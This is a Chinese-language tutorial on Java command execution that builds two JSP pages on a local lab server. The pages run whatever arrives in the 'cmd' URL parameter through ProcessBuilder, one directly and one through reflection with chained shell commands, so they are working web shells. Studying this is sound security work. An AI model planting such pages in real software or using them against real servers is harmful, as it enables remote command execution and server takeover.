0x01 前言

在前面一章节学习了 java.lang.Runtime类 的 exec方法
知道了最终exec方法,会调用ProcessBuilder类来执行本地命令

因此我们直接查看 exec方法,然后对ProcessBuilder说
拿来把你

0x02 环境搭配

为了能模拟实战,这边搭建了一个JSP环境
如果还不会搭建jsp环境的可以按照下面的文章跟着搭建

Mac版IDEA创建maven web项目-详细过程: https://www.yuque.com/pmiaowu/gpy1q8/npv0fr

0x03 ProcessBuilder命令执行测试

  1. #  webapp目录下面新建立一个文件: processBuilder.jsp
  2. # 文件名: processBuilder.jsp
  4. <%@ page import="java.io.InputStream" %>
  5. <%@ page import="java.io.ByteArrayOutputStream" %>
  6. <%@ page contentType="text/html;charset=UTF-8" language="java" %>
  7. <%
  8.     // 漏洞触发点
  9.     String cmd = request.getParameter("cmd");
  10.     InputStream in = new ProcessBuilder(cmd).start().getInputStream();
  12.     ByteArrayOutputStream results = new ByteArrayOutputStream();
  14.     int l = -1;
  15.     byte[] b = new byte[1024];
  16.     while ((l = in.read(b)) != -1) {
  17.         results.write(b, 0, l);
  18.     }
  20.     out.println(results);
  21. %>
  24. # 写好完毕以后启动项目
  25. # request.getParameter("cmd") 就是我们可控的地方
  26. # 表示url get请求的cmd参数
  1. 访问urlhttp://127.0.0.1:8081/mavenJspTest_war/processBuilder.jsp?cmd=whoami

命令执行效果如下:
image.png

0x04 ProcessBuilder命令执行-反射调用

  1. #  webapp目录下面新建立一个文件: processBuilder2.jsp
  2. # 文件名: processBuilder2.jsp
  4. <%@ page import="java.lang.reflect.Constructor" %>
  5. <%@ page import="java.lang.reflect.Method" %>
  6. <%@ page import="java.io.InputStream" %>
  7. <%@ page import="java.io.ByteArrayOutputStream" %>
  8. <%@ page contentType="text/html;charset=UTF-8" language="java" %>
  9. <%
  10.     // 漏洞触发点
  11.     String c = request.getParameter("cmd");
  13.     // 根据系统自动调用对应命令
  14.     String[] cmd;
  15.     String osName = System.getProperties().getProperty("os.name");
  16.     if (osName.toLowerCase().contains("windows")) {
  17.         cmd = new String[]{"cmd", "/c", c};
  18.     } else {
  19.         cmd = new String[]{"/bin/bash", "-c", c};
  20.     }
  22.     // 获取ProcessBuilder类对象
  23.     Class processBuilderClass = Class.forName("java.lang.ProcessBuilder");
  25.     // 获取构造方法
  26.     Constructor processBuilderConstructor = processBuilderClass.getConstructor(String[].class);
  28.     // 创建ProcessBuilder类实例
  29.     Object processBuilderInstance = processBuilderConstructor.newInstance(new Object[]{cmd});
  31.     // 获取Runtime的exec(String cmd)方法
  32.     Method processBuilderMethod = processBuilderClass.getMethod("start");
  34.     // 调用exec方法 等于 r.exec(cmd); cmd参数输入要执行的命令
  35.     Process p = (Process) processBuilderMethod.invoke(processBuilderInstance);
  37.     // 获取命令执行结果
  38.     InputStream in = p.getInputStream();
  40.     ByteArrayOutputStream results = new ByteArrayOutputStream();
  41.     byte[] b = new byte[1024];
  42.     int l = -1;
  44.     while ((l = in.read(b)) != -1) {
  45.         results.write(b, 0, l);
  46.     }
  48.     out.print(results);
  49. %>
  1. 访问url:http://127.0.0.1:8081/mavenJspTest_war/processBuilder2.jsp?cmd=whoami%26whoami

image.png